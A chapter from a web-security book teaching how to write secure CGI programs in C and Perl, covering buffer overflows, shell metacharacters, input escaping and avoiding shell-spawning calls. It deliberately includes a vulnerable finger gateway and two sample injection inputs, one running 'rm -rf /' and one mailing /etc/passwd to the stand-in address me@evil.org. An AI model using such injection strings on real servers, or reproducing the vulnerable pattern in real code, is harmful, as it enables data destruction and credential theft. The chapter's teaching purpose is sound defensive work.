Chapter 9: CGI Security (01)

Writing Secure CGI Programs (03)

At this point, you have presumably secured your machine and your Web server. You are finally ready to learn how to write a secure CGI program. The basic principles for writing secure CGI are similar to the ones outlined earlier: (04)

Your program should do what you want and nothing more. (05)
Don't give the client more information than it needs to know. (06)
Don't trust the client to give you the proper information. (07)

I've already demonstrated the potential danger of the first principle with the guestbook example. I present a few other common mistakes that can open up holes, but you need to remember to consider all of the implications of every function you write or use. (08)

The second principle is simply an extension of a general security principle: the less the outside world knows about the inside of your system, the less-equipped outsiders are to break in. (09)

This last principle is not just a good programming rule of thumb but a good security one, as well. CGI programs should be robust. One of the first things a hacker will try to do to break into a machine through a CGI program is to try to confuse it by experimenting with the input. If your program is not robust, it will either crash or do something it was not designed to do. Both possibilities are undesirable. To combat this possibility, don't make any assumptions about the format of the information or the values the client will send. (010)

The most bare-bones CGI program is a simple input/output program. It takes what the client tells it and returns some response. Such a program offers very little risk (although possible holes still exist, as you will later see). Because the CGI program is not doing anything interesting with the input, little is likely to go wrong. However, once your program starts manipulating the input, possibly calling other programs, writing files, or doing anything more powerful than simply returning some output, you risk introducing a security hole. As usual, power is directly proportional to security risk. (011)

Language Risks (012)

Different languages have different inherent security risks. Secure CGI programs can be written in any language, but you need to be aware of each language's quirks. I discuss only C and Perl here, but some of the traits can be generalized to other languages. For more specific information on other languages, refer to the appropriate documentation. (013)

Earlier in this chapter you learned that, in general, compiled CGI programs are preferable to interpreted scripts. Compiled programs have two advantages: first, you don't need to have an interpreter accessible to the server, and second, the source code is not available. Note that some traditionally interpreted languages such as Perl can be compiled into a binary. (For information on how to do this in Perl, consult Larry Wall and Randal Schwartz's Programming Perl, published by O'Reilly and Associates.) From a security standpoint, a compiled Perl program is just as good as a compiled C program. (014)

Lower-level languages such as C suffer from a problem called a buffer overflow. C doesn't have a good built-in method of dealing with strings. The traditional method is to declare either an array of characters or a pointer to a character. Many have a tendency to use the former method because it is easier to program. Consider the two equivalent excerpts of code in Listings 9.1 and 9.2. (015)

Listing 9.1. Defining a string using an array in C. (016)


#include <stdio.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
  char buffer[80];
  strcpy(buffer,message);
  printf("%s\n",buffer);
  return 0;
}    (017)

Listing 9.2. Defining a string using a pointer in C. (018)


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
  char *buffer = malloc(sizeof(char) * (strlen(message) + 1));
  strcpy(buffer,message);
  printf("%s\n",buffer);
  return 0;
}    (019)

Listing 9.1 is much simpler than Listing 9.2, and in this specific example, both work fine. This is a contrived example; I already know the length of the string I am dealing with, and consequently, I can define the appropriate length array. However, in a CGI program, you have no idea how long the input string is. If message, for example, were 80 characters or longer, the code in Listing 9.1 would write past the end of buffer and most likely crash. (020)

This is called a buffer overflow, and smart hackers can exploit these to remotely execute commands. The buffer overflow was the bug that afflicted NCSA httpd v1.3. It's a good example of how and why a network (or CGI) programmer needs to program with more care. On a single-user machine, a buffer overflow simply leads to a crash. There is no advantage to executing programs using a buffer overflow on a crashed single-user machine because presumably (with the exception of public terminals), you could have run any program you wanted anyway. However, on a networked system, a crashed CGI program is more than a nuisance; it's a potential door for unauthorized users to enter. (021)
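As a rough sketch of the defensive alternative to the unchecked strcpy() in Listing 9.1, the function below measures the input before copying it into a fixed-size buffer and refuses anything that does not fit. The name copy_bounded() is hypothetical and not part of any library, and the sketch assumes that src is already null-terminated.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy src into dst only if it fits, including the
   terminating null. Returns 0 on success. Returns -1 on bad arguments,
   or if src is too long (in which case dst is set to an empty string). */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
  size_t len;

  if (dst == NULL || src == NULL || dstsize == 0)
    return -1;
  len = strlen(src);
  if (len >= dstsize) {       /* no room for the string plus its null */
    dst[0] = '\0';
    return -1;
  }
  memcpy(dst, src, len + 1);  /* len + 1 copies the null as well */
  return 0;
}
```

With an 80-byte buffer as in Listing 9.1, the call copy_bounded(buffer, sizeof buffer, message) would fail cleanly for an overlong message instead of overwriting memory.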

The code in Listing 9.2 solves two problems. First, it dynamically allocates enough memory to store the string. Second, notice that I added 1 to the length of the message, so I actually allocate enough memory for one more character than the length of the string. This guarantees room for the terminating null character: strcpy() copies the source string together with its terminating null (it does not pad the destination), so the destination must be at least strlen() + 1 bytes long. There's no reason to assume that the raw input sent to a CGI script ends in a null character, so when you read that input yourself, place one at the end before passing the buffer to string functions such as strcpy(). (022)
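To make the null-termination point concrete, here is a minimal sketch of reading a POST body. With the POST method, the body arrives on standard input without a terminating null, and the server gives its length in the CONTENT_LENGTH environment variable. The helper name read_body() is hypothetical. It takes the stream and the length string as parameters so that it can be tried without a server, and the 64 KB ceiling is an arbitrary assumption.

```c
#include <stdio.h>
#include <stdlib.h>

#define MAX_BODY 65536L  /* arbitrary ceiling chosen for this sketch */

/* Hypothetical helper: read exactly the number of bytes announced in
   length_str (the value of CONTENT_LENGTH) from in, and return them as a
   freshly allocated, null-terminated string. Returns NULL on a missing,
   malformed, or oversized length, on a short read, or if malloc() fails.
   The caller frees the result. */
char *read_body(FILE *in, const char *length_str)
{
  char *end, *body;
  long len;

  if (in == NULL || length_str == NULL || *length_str == '\0')
    return NULL;
  len = strtol(length_str, &end, 10);
  if (*end != '\0' || len < 0 || len > MAX_BODY)
    return NULL;                     /* don't trust the client's number */

  body = malloc((size_t)len + 1);    /* + 1 for the terminating null */
  if (body == NULL)
    return NULL;
  if (fread(body, 1, (size_t)len, in) != (size_t)len) {
    free(body);
    return NULL;
  }
  body[len] = '\0';                  /* the input carries no null of its own */
  return body;
}
```

In a CGI program the call would look like read_body(stdin, getenv("CONTENT_LENGTH")).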

Provided your C programs avoid problems such as buffer overflows, you can write secure CGI programs. However, this is a tough provision, especially for large, more complicated CGI programs. Problems like this force you to spend more time thinking about low-level programming tasks rather than the general CGI task. For this reason, you might prefer to program in a higher-level programming language (such as Perl) that robustly handles such low-level tasks. (023)

However, there is a flip-side to the high-level nature of Perl. Although you can assume that Perl will properly handle string allocation for you, there is always the danger that Perl is doing something in a high-level syntax of which you are not aware. This will become more clear in the next section on shell dangers. (024)

Shell Dangers (025)

Many CGI tasks are most easily implemented by running other programs. For example, if you were to write a CGI mail gateway, it would be silly to completely reimplement a mail transport agent within the CGI program. It's much more practical to pipe the data into an existing mail transport agent such as sendmail and let sendmail take care of the rest of the work. This practice is fine and is encouraged. (026)

The security risk depends on how you call these external programs. There are several functions that do this in both C and Perl. Many of these functions work by spawning a shell and by having the shell execute the command. These functions are listed in Table 9.1. If you use one of these functions, you are vulnerable to weaknesses in UNIX shells. (027)

Table 9.1. Functions in both C and Perl that spawn a shell. (028)

Perl functions	C functions
system('...')	system()
open('| ...')	popen()
exec('...')
eval('...')
`...`

Why are shells dangerous? There are several nonalphanumeric characters that are reserved as special characters by the shell. These characters are called metacharacters and are listed in Table 9.2. (029)

Table 9.2. Shell metacharacters. (030)

;	<	>	*	|
`	&	$	!	#
(	)	[	]	:
{	}	'	"

Each of these metacharacters performs special functions within the shell. For example, suppose that you wanted to finger a machine and save the results to a file. From the command line, you might type: (031)


finger @fake.machine.org > results    (032)

This would finger the host fake.machine.org and save the results to the text file results. The > character in this case is a redirection character. If you wanted to use the > character literally (for example, to echo it to the screen), you would need to precede the character with a backslash. For example, the following would print a greater-than symbol > to the screen: (033)


echo \>    (034)

This is called escaping or sanitizing the character string. (035)
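The effect of escaping can be observed from C as well. The sketch below assumes a POSIX system, where popen() passes its command string to the shell. The helper shell_output() is a hypothetical name written for this illustration.

```c
#define _POSIX_C_SOURCE 200809L  /* ask for POSIX declarations such as popen() */
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: run cmd through the shell with popen() and collect
   up to outsize - 1 bytes of its standard output in out. Returns 0 on
   success, -1 on failure. */
int shell_output(const char *cmd, char *out, size_t outsize)
{
  FILE *p;
  size_t n;

  if (cmd == NULL || out == NULL || outsize == 0)
    return -1;
  p = popen(cmd, "r");           /* popen() hands cmd to a shell */
  if (p == NULL)
    return -1;
  n = fread(out, 1, outsize - 1, p);
  out[n] = '\0';
  return pclose(p) == -1 ? -1 : 0;
}
```

Given the command string "echo one ; echo two", the shell treats the semicolon as a separator and runs two commands. Given "echo one \\; echo two" (the backslash is doubled only because it sits inside a C string literal), the shell runs a single echo whose arguments include the semicolon.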

How can a hacker use this information to his or her advantage? Observe the finger gateway written in Perl in Listing 9.3. All this program is doing is allowing the user to specify a user and a host, and the CGI will finger the user at the host and display the results. (036)

Listing 9.3. finger.cgi. (037)


#!/usr/local/bin/perl
# finger.cgi - an unsafe finger gateway
require 'cgi-lib.pl';
print &PrintHeader;
if (&ReadParse(*in)) {
  print "<pre>\n";
  print `/usr/bin/finger $in{'username'}`;
  print "</pre>\n";
}
else {
  print "<html> <head>\n";
  print "<title>Finger Gateway</title>\n";
  print "</head>\n<body>\n";
  print "<h1>Finger Gateway</h1>\n";
  print "<form method=POST>\n";
  print "<p>User@Host: <input type=text name=\"username\">\n";
  print "<p><input type=submit>\n";
  print "</form>\n";
  print "</body> </html>\n";
}    (038)

At first glance, this might seem like a harmless finger gateway. There's no danger of a buffer overflow because it is written in Perl. I use the complete pathname of the finger binary so the gateway can't be tricked into using a fake finger program. If the input is in an improper format, the gateway will return an error but not one that can be manipulated. (039)

Figure 9.1. Text to manipulate unsafe finger gateway. (041)

However, what if I try entering the following in the field (as shown in Figure 9.1): (040)


nobody@nowhere.org ; /bin/rm -rf /    (042)

Work out how the following line will deal with this input: (043)


print `/usr/bin/finger $in{'username'}`;    (044)

Because you are using back ticks, first it will spawn a shell. Then it will execute the following command: (045)


/usr/bin/finger nobody@nowhere.org ; /bin/rm -rf /    (046)

What will this do? Imagine typing this in at the command line. It will wipe out all of the files and directories it can, starting from the root directory. We need to sanitize this input to render the semicolon (;) metacharacter harmless. In Perl, this is easily achieved with the function listed in Listing 9.4. (The equivalent function for C is in Listing 9.5; this function is from the cgihtml C library.) (047)

Listing 9.4. escape_input() in Perl. (048)


sub escape_input {
  # work on a copy of the first argument; s/// cannot be applied to @_
  my ($str) = @_;
  $str =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
  return $str;
}    (049)

Listing 9.5. escape_input() in C. (050)


#include <stdlib.h>
#include <string.h>

char *escape_input(char *str)
/* takes string and escapes all metacharacters.  should be used before
   including string in system() or similar call.  returns a newly
   allocated string (caller frees), or NULL if malloc() fails. */
{
  size_t i, j = 0;
  size_t len = strlen(str);
  /* worst case: every character is escaped, plus the terminating null */
  char *new = malloc(sizeof(char) * (len * 2 + 1));
  if (new == NULL)
    return NULL;
  for (i = 0; i < len; i++) {
    switch (str[i]) {
      case '|': case '&': case ';': case '(': case ')': case '<':
      case '>': case '\'': case '"': case '*': case '?': case '\\':
      case '[': case ']': case '$': case '!': case '#': case ':':
      case '`': case '{': case '}':
        new[j] = '\\';   /* prefix the metacharacter with a backslash */
        j++;
        break;
      default:
        break;
    }
    new[j] = str[i];
    j++;
  }
  new[j] = '\0';   /* terminate the string */
  return new;
}    (051)

This returns a string with the shell metacharacters preceded by a backslash. The revised finger.cgi gateway is in Listing 9.6. (052)

Listing 9.6. A safe finger.cgi. (053)


#!/usr/local/bin/perl
# finger.cgi - a safe finger gateway
require 'cgi-lib.pl';
sub escape_input {
  my ($str) = @_;
  $str =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
  return $str;
}
print &PrintHeader;
if (&ReadParse(*in)) {
  # a function call is not interpolated inside back ticks, so escape first
  $username = &escape_input($in{'username'});
  print "<pre>\n";
  print `/usr/bin/finger $username`;
  print "</pre>\n";
}
else {
  print "<html> <head>\n";
  print "<title>Finger Gateway</title>\n";
  print "</head>\n<body>\n";
  print "<h1>Finger Gateway</h1>\n";
  print "<form method=POST>\n";
  print "<p>User@Host: <input type=text name=\"username\">\n";
  print "<p><input type=submit>\n";
  print "</form>\n";
  print "</body> </html>\n";
}    (054)

This time, if you try the same input as before, a shell is spawned and it tries to execute: (055)


/usr/bin/finger nobody@nowhere.org \; /bin/rm -rf /    (056)

The malicious attempt has been rendered useless. Rather than attempt to delete all the directories on the file system, it will try to finger the users nobody@nowhere.org, ;, /bin/rm, -rf, and /. It will probably return an error because it is unlikely that the latter four users exist on your system. (057)

Note a couple of things. First, if your Web server was configured correctly (for example, running as non-root), the attempt to delete everything on the file system would have failed. (If the server was running as root, the potential damage is limitless. Never do this!) Additionally, the attacker would have to assume that the rm command was in the /bin directory, or alternatively that rm was in the path. Both are reasonable guesses for the majority of UNIX machines, but they are not universal truths. In a chrooted environment that did not have the rm binary anywhere in the directory tree, the hacker's efforts would have been useless. By properly securing and configuring the Web server, you can theoretically reduce the potential damage to almost zero, even with a badly written script. (058)

However, this is no cause to lessen your caution when writing your CGI programs. In reality, most Web environments are not chrooted, simply because it prevents the flexibility many people need in a Web server. Even if one could not remove all the files in a file system because the server was not running as root, someone could just as easily try input such as the following, which would have e-mailed the /etc/passwd file to me@evil.org for possible cracking: (059)


nobody@nowhere.org ; /bin/mail me@evil.org < /etc/passwd    (060)

I could do any number of other things by manipulating this one hole, even in a well-configured environment. If you let a hole slip past you in a simple CGI program, how can you be sure you properly and securely configured your complicated UNIX system and Web server? (061)

The answer is you can't. Your best bet is to make sure your CGI programs are secure. Not sanitizing input before running it in a shell is a simple thing to cure, and yet it is one of the most common mistakes in CGI programming. (062)
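A complementary approach, not taken from the listings in this chapter, is to reject suspicious input outright instead of escaping it: accept only characters known to be harmless in a user@host string and refuse everything else. The function name and the particular set of allowed characters below are assumptions made for this sketch.

```c
#include <ctype.h>
#include <stddef.h>

/* Hypothetical validator: returns 1 if s is non-empty, does not start
   with '-', is no longer than maxlen, and is made up only of letters,
   digits, '.', '-', '_', and '@'; returns 0 otherwise. The allowed set
   is an assumption for this sketch. */
int is_plain_finger_target(const char *s, size_t maxlen)
{
  size_t i;

  if (s == NULL || s[0] == '\0')
    return 0;
  if (s[0] == '-')
    return 0;                 /* could be taken for a command-line option */
  for (i = 0; s[i] != '\0'; i++) {
    unsigned char c = (unsigned char)s[i];
    if (i >= maxlen)
      return 0;               /* longer than the caller allows */
    if (!isalnum(c) && c != '.' && c != '-' && c != '_' && c != '@')
      return 0;               /* anything outside the allowed set is refused */
  }
  return 1;
}
```

A gateway could call this before doing anything else with the field and return an error page when it yields 0. The malicious input shown earlier fails the check because of its spaces, semicolon, and slashes.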

Fortunately, Perl has a good mechanism for catching potentially tainted variables. If you use taintperl instead of Perl (or perl -T if you are using Perl 5), the script will exit at points where potentially tainted variables are passed to a shell command. This will help you catch all instances of potentially tainted variables before you actually begin to use your CGI program. (063)

Notice that there are several more functions in Perl that spawn the shell than there are in C. It is not immediately obvious, even to the intermediate Perl programmer, that back ticks spawn a shell before executing the program. This is the flip side of a higher-level language: you don't know what security holes a function might cause because you don't necessarily know exactly what it does. (064)

You don't need to sanitize the input if you avoid using functions that spawn shells. In Perl, you can do this with either the system() or exec() function by passing the program and each of its arguments as separate elements of a list rather than as one string. For example, the following is safe without sanitizing $in{'username'}: (065)


system("/usr/bin/finger",$in{'username'});    (066)

However, in the case of your finger gateway, this form of system() does not help by itself, because you need to process the output of the finger command and system() does not hand that output back to your program. (067)

In C, you can also execute programs directly by using the exec family of functions: execv(), execl(), execvp(), execlp(), and execle(). execl() would be the C equivalent of the Perl function exec() with multiple arguments; to get the behavior of Perl's system(), call fork() first and have the parent wait for the child. Which exec function you use and how you implement it depends on your need; specifics go beyond the scope of this book. (068)
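A minimal sketch of the direct-execution approach on a POSIX system: call fork(), connect the child's standard output to a pipe, and call execl() with the argument as its own element, so that no shell ever parses it. This also lets the parent capture the program's output. The helper name run_direct() and its fixed single-argument signature are assumptions for illustration, and a real gateway would need more careful error handling.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run "path arg" without a shell and collect up to
   outsize - 1 bytes of its standard output in out. Returns the child's
   exit status, or -1 on failure. */
int run_direct(const char *path, const char *arg, char *out, size_t outsize)
{
  int fd[2], status;
  size_t used = 0;
  ssize_t n;
  pid_t pid;

  if (path == NULL || arg == NULL || out == NULL || outsize == 0)
    return -1;
  if (pipe(fd) == -1)
    return -1;
  pid = fork();
  if (pid == -1) {
    close(fd[0]);
    close(fd[1]);
    return -1;
  }
  if (pid == 0) {                          /* child */
    close(fd[0]);
    dup2(fd[1], STDOUT_FILENO);            /* stdout now feeds the pipe */
    close(fd[1]);
    execl(path, path, arg, (char *)NULL);  /* arg is passed as-is, unparsed */
    _exit(127);                            /* only reached if execl() failed */
  }
  close(fd[1]);                            /* parent only reads */
  while (used < outsize - 1 &&
         (n = read(fd[0], out + used, outsize - 1 - used)) > 0)
    used += (size_t)n;
  out[used] = '\0';
  close(fd[0]);
  if (waitpid(pid, &status, 0) == -1)
    return -1;
  return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Called as run_direct("/usr/bin/finger", username, buf, sizeof buf), a semicolon in username reaches finger as an ordinary character in its single argument, because there is no shell to interpret it.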
